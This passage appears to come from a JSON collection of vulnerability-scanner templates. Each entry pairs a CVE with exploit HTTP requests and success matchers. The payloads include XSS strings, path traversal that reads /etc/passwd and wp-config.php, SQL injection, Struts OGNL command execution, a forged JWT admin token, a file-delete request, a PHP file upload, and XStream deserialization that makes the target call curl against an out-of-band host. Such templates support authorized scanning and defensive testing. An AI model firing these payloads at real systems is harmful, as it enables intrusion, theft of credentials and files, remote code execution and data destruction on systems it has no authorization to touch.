Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/import-legacy-media/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Search public registries"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/movies/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Movies =","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Video Gallery WordPress DZS"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/swipehq-payment-gateway-woocommerce/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7285","info":{"name":"XStream <1.4.6/1.4.10 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <contact class='dynamic-proxy'>\n      <interface>java.lang.Comparable</interface>\n      <handler class='java.beans.EventHandler'>\n          <target class='java.lang.ProcessBuilder'>\n              <command>\n                <string>curl</string>\n                <string>http://{{interactsh-url}}</string>\n              </command>\n          </target>\n          <action>start</action>\n      </handler>\n  </contact>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2013-2251","info":{"name":"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"params":["redirect","action","redirectAction"]},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]},{"type":"status","status":[200,400],"condition":"or"}]}]},{"id":"CVE-2013-4625","info":{"name":"WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Duplicator - WordPress Migration"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2248","info":{"name":"Apache Struts - Multiple Open Redirection Vulnerabilities","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.action?redirect:http://www.interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-6281","info":{"name":"WordPress Spreadsheet - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["page: '<script>alert(document.domain)</script>'","dhx_rel_path"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3526","info":{"name":"WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["traffic analy","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2287","info":{"name":"WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/uploader/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Uploader","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-5528","info":{"name":"Cisco Unified Communications Manager 7/8/9 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-2621","info":{"name":"Telaen => v1.3.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/telaen/redir.php?https://interact.sh","{{BaseURL}}/redir.php?https://interact.sh"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2013-5979","info":{"name":"Xibo 1.2.2/1.4.1 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7240","info":{"name":"WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-7091","info":{"name":"Zimbra Collaboration Server 7.2.2/8.0.2 Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00","{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","words":["zimbra_server_hostname","zimbra_ldap_userdn","zimbra_ldap_password","ldap_postfix_password","ldap_amavis_password","ldap_nginx_password","mysql_root_password"],"condition":"or"},{"type":"regex","regex":["root=.*:0:0"]}]}]},{"id":"CVE-2013-1965","info":{"name":"Apache Struts2 S2-012 RCE","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/user.action"],"body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-3827","info":{"name":"Javafaces LFI","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}{{paths}}"],"payloads":{"paths":["/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/secureader/javax.faces.resource/web.xml?loc=../WEB-INF","/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF","/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=..","/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF","/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","</web-app>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2013-4117","info":{"name":"WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Category Grid View Gallery ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24226","info":{"name":"AccessAlly <3.5.7 - Sensitive Information Leakage","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<div id=\"accessally-testing-data\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46417","info":{"name":"Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password="],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20114","info":{"name":"TCExam <= 14.8.1 - Sensitive Information Exposure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cache/backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of /cache/backup","Parent Directory",".sql.gz"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter 